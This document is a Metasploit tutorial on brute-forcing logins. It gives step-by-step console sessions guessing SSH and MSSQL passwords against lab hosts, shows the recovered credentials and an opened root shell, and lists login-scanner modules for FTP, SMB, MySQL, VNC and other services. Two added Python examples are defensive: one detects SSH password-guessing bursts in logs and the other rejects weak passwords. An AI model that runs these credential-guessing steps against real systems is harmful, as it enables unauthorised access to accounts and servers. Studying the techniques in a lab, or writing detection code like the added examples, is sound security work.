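Using Metasploit's brute-force modules
This article is for study only. The author accepts no legal liability for any adverse consequences arising from other uses!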
┌──(root💀kali)-[~/桌面]
└─# msfconsole
=[ metasploit v6.0.15-dev ]
+ -- --=[ 2071 exploits - 1123 auxiliary - 352 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Metasploit can be configured at startup, see msfconsole --help to learn more
msf6 >
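We are now in the Metasploit console. This article mainly covers the brute-force modules.
use            select a module
set            set an option
show options   show the current option values
back           leave the current module
info           show information about a module
exploit/run    run the module
SSH example
msf6 > use auxiliary/scanner/ssh/ssh_login # select the module
msf6 auxiliary(scanner/ssh/ssh_login) > info # show the module's information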
Name: SSH Login Check Scanner
Module: auxiliary/scanner/ssh/ssh_login
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
todb <todb@metasploit.com>
Check supported:
No
Basic options:
Name              Current Setting  Required  Description
----              ---------------  --------  -----------
BLANK_PASSWORDS   false            no        Try blank passwords for all users
BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
DB_ALL_PASS       false            no        Add all passwords in the current database to the list
DB_ALL_USERS      false            no        Add all users in the current database to the list
PASSWORD                           no        A specific password to authenticate with
PASS_FILE                          no        File containing passwords, one per line
RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT             22               yes       The target port
STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
THREADS           1                yes       The number of concurrent threads (max one per host)
USERNAME                           no        A specific username to authenticate as
USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
USER_AS_PASS      false            no        Try the username as the password for all users
USER_FILE                          no        File containing usernames, one per line
VERBOSE           false            yes       Whether to print output for all attempts
Description:
This module will test ssh logins on a range of machines and report
successful logins. If you have loaded a database plugin and
connected to a database this module will record successful logins
and hosts so you can track your access.
References:
https://cvedetails.com/cve/CVE-1999-0502/
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.21.141
RHOSTS => 192.168.21.141 # target IP
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME root
USERNAME => root # target user
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/passwd.txt # password wordlist
PASS_FILE => /root/passwd.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true # stop once a valid password is found
msf6 auxiliary(scanner/ssh/ssh_login) > set THREADS 16 # thread count (the module uses at most one per host)
THREADS => 16
msf6 auxiliary(scanner/ssh/ssh_login) > run # start the run; the exploit command does the same
[+] 192.168.21.141:22 - Success: 'root:111111' 'uid=0(root) gid=0(root) 组=0(root) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.localdomain 3.10.0-957.el7.x86_64 #1 SMP Thu Nov 8 23:39:32 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (192.168.21.147:44141 -> 192.168.21.141:22) at 2021-11-30 20:51:21 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) >
The username is root and the password is 111111.
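On the target, the run above leaves a recognizable trail in the sshd authentication log: a burst of failed password attempts from one address, ending in an accepted one. The following Python is an added example, not part of the original article or of Metasploit; the log lines are constructed to resemble that run, and the threshold, window and year are assumed parameters.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd log lines modelled on the run above (not captured from a real host).
SAMPLE_LOG = """\
Nov 30 20:50:02 localhost sshd[2090]: Failed password for admin from 192.168.21.10 port 50122 ssh2
Nov 30 20:50:09 localhost sshd[2090]: Accepted password for admin from 192.168.21.10 port 50122 ssh2
Nov 30 20:51:18 localhost sshd[2101]: Failed password for root from 192.168.21.147 port 44101 ssh2
Nov 30 20:51:18 localhost sshd[2103]: Failed password for root from 192.168.21.147 port 44103 ssh2
Nov 30 20:51:19 localhost sshd[2105]: Failed password for root from 192.168.21.147 port 44109 ssh2
Nov 30 20:51:19 localhost sshd[2107]: Failed password for root from 192.168.21.147 port 44115 ssh2
Nov 30 20:51:20 localhost sshd[2109]: Failed password for root from 192.168.21.147 port 44123 ssh2
Nov 30 20:51:20 localhost sshd[2111]: Failed password for root from 192.168.21.147 port 44131 ssh2
Nov 30 20:51:21 localhost sshd[2117]: Accepted password for root from 192.168.21.147 port 44141 ssh2
"""

LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+")

def detect(log_text, threshold=5, window=timedelta(seconds=60), year=2021):
    """Return (kind, source, user, failures) alerts; syslog lines carry no year, so it is passed in."""
    failures = defaultdict(deque)  # source address -> timestamps of recent failures
    alerts = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        recent = failures[m["src"]]
        while recent and ts - recent[0] > window:  # drop failures older than the window
            recent.popleft()
        if m["result"] == "Failed":
            recent.append(ts)
            if len(recent) == threshold:  # alert once when the burst reaches the threshold
                alerts.append(("guessing", m["src"], m["user"], len(recent)))
        elif len(recent) >= threshold:  # a success right after a burst: treat as compromise
            alerts.append(("guessed", m["src"], m["user"], len(recent)))
            recent.clear()
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The "guessed" alert is the one that needs an immediate response: the password for that account is known to the source address and a session was opened.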
MSSQL example
msf6 auxiliary(scanner/ssh/ssh_login) > back
msf6 > use auxiliary/scanner/mssql/mssql_login # select the MSSQL module
msf6 auxiliary(scanner/mssql/mssql_login) > show options # show the option values
Module options (auxiliary/scanner/mssql/mssql_login):
Name                 Current Setting  Required  Description
----                 ---------------  --------  -----------
BLANK_PASSWORDS      true             no        Try blank passwords for all users
BRUTEFORCE_SPEED     5                yes       How fast to bruteforce, from 0 to 5
DB_ALL_CREDS         false            no        Try each user/password couple stored in the current database
DB_ALL_PASS          false            no        Add all passwords in the current database to the list
DB_ALL_USERS         false            no        Add all users in the current database to the list
PASSWORD                              no        A specific password to authenticate with
PASS_FILE                             no        File containing passwords, one per line
RHOSTS                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT                1433             yes       The target port (TCP)
STOP_ON_SUCCESS      false            yes       Stop guessing when a credential works for a host
TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
THREADS              1                yes       The number of concurrent threads (max one per host)
USERNAME             sa               no        A specific username to authenticate as
USERPASS_FILE                         no        File containing users and passwords separated by space, one pair per line
USER_AS_PASS         false            no        Try the username as the password for all users
USER_FILE                             no        File containing usernames, one per line
USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)
VERBOSE              true             yes       Whether to print output for all attempts
msf6 auxiliary(scanner/mssql/mssql_login) > set DB_ALL_USERS true
DB_ALL_USERS => true # add the users stored in the current database
msf6 auxiliary(scanner/mssql/mssql_login) > set PASS_FILE /root/passwd.txt # password wordlist
PASS_FILE => /root/passwd.txt
msf6 auxiliary(scanner/mssql/mssql_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true # stop automatically once a valid password is found
msf6 auxiliary(scanner/mssql/mssql_login) > set RHOSTS 192.168.21.162 # target IP
RHOSTS => 192.168.21.162
msf6 auxiliary(scanner/mssql/mssql_login) > exploit # start the run
[*] 192.168.21.162:1433 - 192.168.21.162:1433 - MSSQL - Starting authentication scanner.
[-] 192.168.21.162:1433 - 192.168.21.162:1433 - LOGIN FAILED: WORKSTATION\sa:sanhe000~!@# (Incorrect: )
[+] 192.168.21.162:1433 - 192.168.21.162:1433 - Login Successful: WORKSTATION\sa:123456
[*] 192.168.21.162:1433 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/mssql/mssql_login) >
The username is sa and the password is 123456.
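Both runs succeeded because the accounts used passwords that any wordlist contains. The following added example (not from the original article) is a check applied when a password is set; it refuses what the BLANK_PASSWORDS, USER_AS_PASS and PASS_FILE options listed above would guess. The deny list, the minimum length and the function name are assumptions.

```python
import re

# Constructed stand-in for a real common-password list (assumption); it holds the
# two passwords recovered in the runs on this page plus a few typical entries.
COMMON_PASSWORDS = {"111111", "123456", "password", "qwerty", "admin123"}
SEQUENCES = ("0123456789", "abcdefghijklmnopqrstuvwxyz", "qwertyuiop")

def rejection_reasons(username, password, deny_list=COMMON_PASSWORDS, min_length=8):
    """Return the reasons a new password should be refused (empty list = accept)."""
    user, pw = username.strip().lower(), password.strip().lower()
    if not pw:
        return ["blank"]  # what BLANK_PASSWORDS tries
    reasons = []
    if len(password) < min_length:
        reasons.append("too short")
    # What USER_AS_PASS tries, plus the same name with digits or symbols appended.
    if user and re.sub(r"[\d\W_]+$", "", pw) == user:
        reasons.append("derived from username")
    if pw in deny_list:  # what a PASS_FILE wordlist tries
        reasons.append("in common-password list")
    if len(set(pw)) == 1:
        reasons.append("single repeated character")
    if any(pw in s or pw in s[::-1] for s in SEQUENCES):
        reasons.append("keyboard or counting sequence")
    return reasons

if __name__ == "__main__":
    # The two credentials found above, then a variant and a passphrase (constructed).
    for user, pw in [("root", "111111"), ("sa", "123456"),
                     ("sa", "SA2021!!"), ("sa", "correct horse battery staple")]:
        print(user, repr(pw), rejection_reasons(user, pw) or "accepted")
```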
ftp
msf6 > auxiliary/scanner/ftp/ftp_login
telnet
msf6 > auxiliary/scanner/telnet/telnet_login
smb
msf6 > auxiliary/scanner/smb/smb_login
MySQL
msf6 > auxiliary/scanner/mysql/mysql_login
Oracle
msf6 > auxiliary/scanner/oracle/oracle_login
postgres
msf6 > auxiliary/scanner/postgres/postgres_login
vnc
msf6 > auxiliary/scanner/vnc/vnc_login
pcanywhere
msf6 > auxiliary/scanner/pcanywhere/pcanywhere_login
snmp
msf6 > auxiliary/scanner/snmp/snmp_login